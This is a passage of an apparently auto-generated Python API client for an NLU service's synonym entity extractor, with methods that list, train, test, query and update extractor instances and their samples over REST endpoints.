# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyHeader_old'] # noqa: E501
return self.api_client.call_api(
'/nlu/v2/synonym_entity_extractors', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[SynonymEntityExtractorInstanceDetail]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def synonym_entity_extractor_get_labels(self, instance_name, **kwargs): # noqa: E501
"""Get list of possible labels. # noqa: E501
Returns the extractor's list of possible entity labels. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_get_labels(instance_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param str x_caller:
:return: list[ClassLabel]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.synonym_entity_extractor_get_labels_with_http_info(instance_name, **kwargs) # noqa: E501
else:
(data) = self.synonym_entity_extractor_get_labels_with_http_info(instance_name, **kwargs) # noqa: E501
return data
def synonym_entity_extractor_get_labels_with_http_info(self, instance_name, **kwargs): # noqa: E501
"""Get list of possible labels. # noqa: E501
Returns the extractor's list of possible entity labels. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_get_labels_with_http_info(instance_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param str x_caller:
:return: list[ClassLabel]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['instance_name', 'x_caller'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method synonym_entity_extractor_get_labels" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'instance_name' is set
if ('instance_name' not in params or
params['instance_name'] is None):
raise ValueError("Missing the required parameter `instance_name` when calling `synonym_entity_extractor_get_labels`") # noqa: E501
collection_formats = {}
path_params = {}
if 'instance_name' in params:
path_params['instance_name'] = params['instance_name'] # noqa: E501
query_params = []
header_params = {}
if 'x_caller' in params:
header_params['X-CALLER'] = params['x_caller'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyHeader_old'] # noqa: E501
return self.api_client.call_api(
'/nlu/v2/synonym_entity_extractors/{instance_name}/labels', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[ClassLabel]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def synonym_entity_extractor_get_params(self, instance_name, **kwargs): # noqa: E501
"""Get the editable model parameters of named synonym entity extractor. # noqa: E501
Get the editable model parameters of named synonym entity extractor. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_get_params(instance_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param str x_caller:
:return: ModelParams
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.synonym_entity_extractor_get_params_with_http_info(instance_name, **kwargs) # noqa: E501
else:
(data) = self.synonym_entity_extractor_get_params_with_http_info(instance_name, **kwargs) # noqa: E501
return data
def synonym_entity_extractor_get_params_with_http_info(self, instance_name, **kwargs): # noqa: E501
"""Get the editable model parameters of named synonym entity extractor. # noqa: E501
Get the editable model parameters of named synonym entity extractor. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_get_params_with_http_info(instance_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param str x_caller:
:return: ModelParams
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['instance_name', 'x_caller'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method synonym_entity_extractor_get_params" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'instance_name' is set
if ('instance_name' not in params or
params['instance_name'] is None):
raise ValueError("Missing the required parameter `instance_name` when calling `synonym_entity_extractor_get_params`") # noqa: E501
collection_formats = {}
path_params = {}
if 'instance_name' in params:
path_params['instance_name'] = params['instance_name'] # noqa: E501
query_params = []
header_params = {}
if 'x_caller' in params:
header_params['X-CALLER'] = params['x_caller'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyHeader_old'] # noqa: E501
return self.api_client.call_api(
'/nlu/v2/synonym_entity_extractors/{instance_name}/params', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ModelParams', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def synonym_entity_extractor_get_testing_samples(self, instance_name, **kwargs): # noqa: E501
"""Get testing samples. # noqa: E501
Get the testing samples of the named extractor. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_get_testing_samples(instance_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param str x_caller:
:param int index: The sample index to start from.
:param int len: The number of samples to return.
:return: list[SynonymSample]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.synonym_entity_extractor_get_testing_samples_with_http_info(instance_name, **kwargs) # noqa: E501
else:
(data) = self.synonym_entity_extractor_get_testing_samples_with_http_info(instance_name, **kwargs) # noqa: E501
return data
def synonym_entity_extractor_get_testing_samples_with_http_info(self, instance_name, **kwargs): # noqa: E501
"""Get testing samples. # noqa: E501
Get the testing samples of the named extractor. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_get_testing_samples_with_http_info(instance_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param str x_caller:
:param int index: The sample index to start from.
:param int len: The number of samples to return.
:return: list[SynonymSample]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['instance_name', 'x_caller', 'index', 'len'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method synonym_entity_extractor_get_testing_samples" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'instance_name' is set
if ('instance_name' not in params or
params['instance_name'] is None):
raise ValueError("Missing the required parameter `instance_name` when calling `synonym_entity_extractor_get_testing_samples`") # noqa: E501
collection_formats = {}
path_params = {}
if 'instance_name' in params:
path_params['instance_name'] = params['instance_name'] # noqa: E501
query_params = []
if 'index' in params:
query_params.append(('index', params['index'])) # noqa: E501
if 'len' in params:
query_params.append(('len', params['len'])) # noqa: E501
header_params = {}
if 'x_caller' in params:
header_params['X-CALLER'] = params['x_caller'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyHeader_old'] # noqa: E501
return self.api_client.call_api(
'/nlu/v2/synonym_entity_extractors/{instance_name}/testing_samples', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[SynonymSample]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
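# Paging sketch for the sample-listing calls above and below: `index` and
# `len` page through the stored samples. The instance name and page size are
# illustrative assumptions, not values taken from this file.
#
#     first_page = api.synonym_entity_extractor_get_testing_samples(
#         'my-extractor', index=0, len=100)
#     next_page = api.synonym_entity_extractor_get_testing_samples(
#         'my-extractor', index=100, len=100)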
def synonym_entity_extractor_get_training_samples(self, instance_name, **kwargs): # noqa: E501
"""Get training samples. # noqa: E501
Get the training samples of the named extractor. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_get_training_samples(instance_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param str x_caller:
:param int index: The sample index to start from.
:param int len: The number of samples to return.
:return: list[SynonymSample]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.synonym_entity_extractor_get_training_samples_with_http_info(instance_name, **kwargs) # noqa: E501
else:
(data) = self.synonym_entity_extractor_get_training_samples_with_http_info(instance_name, **kwargs) # noqa: E501
return data
def synonym_entity_extractor_get_training_samples_with_http_info(self, instance_name, **kwargs): # noqa: E501
"""Get training samples. # noqa: E501
Get the training samples of the named extractor. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_get_training_samples_with_http_info(instance_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param str x_caller:
:param int index: The sample index to start from.
:param int len: The number of samples to return.
:return: list[SynonymSample]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['instance_name', 'x_caller', 'index', 'len'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method synonym_entity_extractor_get_training_samples" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'instance_name' is set
if ('instance_name' not in params or
params['instance_name'] is None):
raise ValueError("Missing the required parameter `instance_name` when calling `synonym_entity_extractor_get_training_samples`") # noqa: E501
collection_formats = {}
path_params = {}
if 'instance_name' in params:
path_params['instance_name'] = params['instance_name'] # noqa: E501
query_params = []
if 'index' in params:
query_params.append(('index', params['index'])) # noqa: E501
if 'len' in params:
query_params.append(('len', params['len'])) # noqa: E501
header_params = {}
if 'x_caller' in params:
header_params['X-CALLER'] = params['x_caller'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyHeader_old'] # noqa: E501
return self.api_client.call_api(
'/nlu/v2/synonym_entity_extractors/{instance_name}/training_samples', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[SynonymSample]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def synonym_entity_extractor_retrieve(self, instance_name, text_input, **kwargs): # noqa: E501
"""Predict which entities was mentioned. # noqa: E501
Predict which entities was mentioned. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_retrieve(instance_name, text_input, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param TextInput text_input: The input text. (required)
:param str x_caller:
:return: list[SynonymEntity]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.synonym_entity_extractor_retrieve_with_http_info(instance_name, text_input, **kwargs) # noqa: E501
else:
(data) = self.synonym_entity_extractor_retrieve_with_http_info(instance_name, text_input, **kwargs) # noqa: E501
return data
def synonym_entity_extractor_retrieve_with_http_info(self, instance_name, text_input, **kwargs): # noqa: E501
"""Predict which entities was mentioned. # noqa: E501
Predict which entities was mentioned. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_retrieve_with_http_info(instance_name, text_input, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param TextInput text_input: The input text. (required)
:param str x_caller:
:return: list[SynonymEntity]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['instance_name', 'text_input', 'x_caller'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method synonym_entity_extractor_retrieve" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'instance_name' is set
if ('instance_name' not in params or
params['instance_name'] is None):
raise ValueError("Missing the required parameter `instance_name` when calling `synonym_entity_extractor_retrieve`") # noqa: E501
# verify the required parameter 'text_input' is set
if ('text_input' not in params or
params['text_input'] is None):
raise ValueError("Missing the required parameter `text_input` when calling `synonym_entity_extractor_retrieve`") # noqa: E501
collection_formats = {}
path_params = {}
if 'instance_name' in params:
path_params['instance_name'] = params['instance_name'] # noqa: E501
query_params = []
header_params = {}
if 'x_caller' in params:
header_params['X-CALLER'] = params['x_caller'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'text_input' in params:
body_params = params['text_input']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyHeader_old'] # noqa: E501
return self.api_client.call_api(
'/nlu/v2/synonym_entity_extractors/{instance_name}/retrieve', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[SynonymEntity]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
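# Usage sketch for the retrieve endpoint above, following the sync/async
# pattern documented in the docstrings. The instance name, the sentence, and
# the `text=` constructor keyword of the referenced `TextInput` model are
# illustrative assumptions.
#
#     entities = api.synonym_entity_extractor_retrieve(
#         'my-extractor', TextInput(text='I need a flight to London.'))
#     thread = api.synonym_entity_extractor_retrieve(
#         'my-extractor', TextInput(text='I need a flight to London.'),
#         async_req=True)
#     entities = thread.get()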
def synonym_entity_extractor_set_params(self, instance_name, model_params, **kwargs): # noqa: E501
"""Set the model parameters of named synonym entity extractor. # noqa: E501
Set the model parameters of named synonym entity extractor. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_set_params(instance_name, model_params, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param ModelParams model_params: The model parameters. (required)
:param str x_caller:
:return: SynonymEntityExtractorInstanceDetail
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.synonym_entity_extractor_set_params_with_http_info(instance_name, model_params, **kwargs) # noqa: E501
else:
(data) = self.synonym_entity_extractor_set_params_with_http_info(instance_name, model_params, **kwargs) # noqa: E501
return data
def synonym_entity_extractor_set_params_with_http_info(self, instance_name, model_params, **kwargs): # noqa: E501
"""Set the model parameters of named synonym entity extractor. # noqa: E501
Set the model parameters of named synonym entity extractor. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_set_params_with_http_info(instance_name, model_params, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param ModelParams model_params: The model parameters. (required)
:param str x_caller:
:return: SynonymEntityExtractorInstanceDetail
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['instance_name', 'model_params', 'x_caller'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method synonym_entity_extractor_set_params" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'instance_name' is set
if ('instance_name' not in params or
params['instance_name'] is None):
raise ValueError("Missing the required parameter `instance_name` when calling `synonym_entity_extractor_set_params`") # noqa: E501
# verify the required parameter 'model_params' is set
if ('model_params' not in params or
params['model_params'] is None):
raise ValueError("Missing the required parameter `model_params` when calling `synonym_entity_extractor_set_params`") # noqa: E501
collection_formats = {}
path_params = {}
if 'instance_name' in params:
path_params['instance_name'] = params['instance_name'] # noqa: E501
query_params = []
header_params = {}
if 'x_caller' in params:
header_params['X-CALLER'] = params['x_caller'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'model_params' in params:
body_params = params['model_params']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyHeader_old'] # noqa: E501
return self.api_client.call_api(
'/nlu/v2/synonym_entity_extractors/{instance_name}/params', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SynonymEntityExtractorInstanceDetail', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def synonym_entity_extractor_test(self, instance_name, test_details, **kwargs): # noqa: E501
"""Test the named synonym entity extractor. # noqa: E501
Test the named synonym entity extractor with the testing data already provided. Returns the details of the instance. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_test(instance_name, test_details, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param TestDetails test_details: The arguments provided to the test operation. (required)
:param str x_caller:
:return: SynonymEntityExtractorInstanceDetail
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.synonym_entity_extractor_test_with_http_info(instance_name, test_details, **kwargs) # noqa: E501
else:
(data) = self.synonym_entity_extractor_test_with_http_info(instance_name, test_details, **kwargs) # noqa: E501
return data
def synonym_entity_extractor_test_with_http_info(self, instance_name, test_details, **kwargs): # noqa: E501
"""Test the named synonym entity extractor. # noqa: E501
Test the named synonym entity extractor with the testing data already provided. Returns the details of the instance. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_test_with_http_info(instance_name, test_details, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param TestDetails test_details: The arguments provided to the test operation. (required)
:param str x_caller:
:return: SynonymEntityExtractorInstanceDetail
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['instance_name', 'test_details', 'x_caller'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method synonym_entity_extractor_test" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'instance_name' is set
if ('instance_name' not in params or
params['instance_name'] is None):
raise ValueError("Missing the required parameter `instance_name` when calling `synonym_entity_extractor_test`") # noqa: E501
# verify the required parameter 'test_details' is set
if ('test_details' not in params or
params['test_details'] is None):
raise ValueError("Missing the required parameter `test_details` when calling `synonym_entity_extractor_test`") # noqa: E501
collection_formats = {}
path_params = {}
if 'instance_name' in params:
path_params['instance_name'] = params['instance_name'] # noqa: E501
query_params = []
header_params = {}
if 'x_caller' in params:
header_params['X-CALLER'] = params['x_caller'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'test_details' in params:
body_params = params['test_details']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyHeader_old'] # noqa: E501
return self.api_client.call_api(
'/nlu/v2/synonym_entity_extractors/{instance_name}/test', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SynonymEntityExtractorInstanceDetail', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def synonym_entity_extractor_train(self, instance_name, train_details, **kwargs): # noqa: E501
"""Train the named synonym extractor. # noqa: E501
Train the named synonym extractor with the training and testing data already provided. Returns the updated instance details. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_train(instance_name, train_details, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param TrainDetails train_details: The arguments provided to the train operation. (required)
:param str x_caller:
:return: SynonymEntityExtractorInstanceDetail
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.synonym_entity_extractor_train_with_http_info(instance_name, train_details, **kwargs) # noqa: E501
else:
(data) = self.synonym_entity_extractor_train_with_http_info(instance_name, train_details, **kwargs) # noqa: E501
return data
def synonym_entity_extractor_train_with_http_info(self, instance_name, train_details, **kwargs): # noqa: E501
"""Train the named synonym extractor. # noqa: E501
Train the named synonym extractor with the training and testing data already provided. Returns the updated instance details. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_train_with_http_info(instance_name, train_details, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param TrainDetails train_details: The arguments provided to the train operation. (required)
:param str x_caller:
:return: SynonymEntityExtractorInstanceDetail
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['instance_name', 'train_details', 'x_caller'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method synonym_entity_extractor_train" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'instance_name' is set
if ('instance_name' not in params or
params['instance_name'] is None):
raise ValueError("Missing the required parameter `instance_name` when calling `synonym_entity_extractor_train`") # noqa: E501
# verify the required parameter 'train_details' is set
if ('train_details' not in params or
params['train_details'] is None):
raise ValueError("Missing the required parameter `train_details` when calling `synonym_entity_extractor_train`") # noqa: E501
collection_formats = {}
path_params = {}
if 'instance_name' in params:
path_params['instance_name'] = params['instance_name'] # noqa: E501
query_params = []
header_params = {}
if 'x_caller' in params:
header_params['X-CALLER'] = params['x_caller'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'train_details' in params:
body_params = params['train_details']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyHeader_old'] # noqa: E501
return self.api_client.call_api(
'/nlu/v2/synonym_entity_extractors/{instance_name}/train', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SynonymEntityExtractorInstanceDetail', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
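# Train-then-test workflow sketch combining the two calls above. `TrainDetails`
# and `TestDetails` are the request models named in the signatures; their
# constructor arguments are not shown in this file, so constructing them empty
# here is an assumption.
#
#     detail = api.synonym_entity_extractor_train('my-extractor', TrainDetails())
#     detail = api.synonym_entity_extractor_test('my-extractor', TestDetails())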
def synonym_entity_extractor_update_testing_samples(self, instance_name, synonym_sample_list, **kwargs): # noqa: E501
"""Update testing samples by UUID. # noqa: E501
Update testing samples of the named synonym entity extractor. A sample's UUID is used to uniquely identify it. Returns the samples that were updated. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_update_testing_samples(instance_name, synonym_sample_list, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param list[SynonymSample] synonym_sample_list: List of synonym samples. A sample's UUID is used to uniquely identify it. (required)
:param str x_caller:
:return: list[SynonymSample]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.synonym_entity_extractor_update_testing_samples_with_http_info(instance_name, synonym_sample_list, **kwargs) # noqa: E501
else:
(data) = self.synonym_entity_extractor_update_testing_samples_with_http_info(instance_name, synonym_sample_list, **kwargs) # noqa: E501
return data
def synonym_entity_extractor_update_testing_samples_with_http_info(self, instance_name, synonym_sample_list, **kwargs): # noqa: E501
"""Update testing samples by UUID. # noqa: E501
Update testing samples of the named synonym entity extractor. A sample's UUID is used to uniquely identify it. Returns the samples that were updated. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.synonym_entity_extractor_update_testing_samples_with_http_info(instance_name, synonym_sample_list, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instance_name: The name of the instance. (required)
:param list[SynonymSample] synonym_sample_list: List of synonym samples. A sample's UUID is used to uniquely identify it. (required)
:param str x_caller:
:return: list[SynonymSample]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['instance_name', 'synonym_sample_list', 'x_caller'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method synonym_entity_extractor_update_testing_samples" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'instance_name' is set
if ('instance_name' not in params or
params['instance_name'] is None):
raise ValueError("Missing the required parameter `instance_name` when calling `synonym_entity_extractor_update_testing_samples`") # noqa: E501
# verify the required parameter 'synonym_sample_list' is set
if ('synonym_sample_list' not in params or
params['synonym_sample_list'] is None):
raise ValueError("Missing the required parameter `synonym_sample_list` when calling `synonym_entity_extractor_update_testing_samples`") # noqa: E501
collection_formats = {}
path_params = {}
if 'instance_name' in params:
path_params['instance_name'] = params['instance_name'] # noqa: E501
query_params = []
header_params = {}
if 'x_caller' in params:
header_params['X-CALLER'] = params['x_caller'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'synonym_sample_list' in params:
body_params = params['synonym_sample_list']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyHeader_old'] # noqa: E501
return self.api_client.call_api(
'/nlu/v2/synonym_entity_extractors/{instance_name}/testing_samples', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[SynonymSample]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
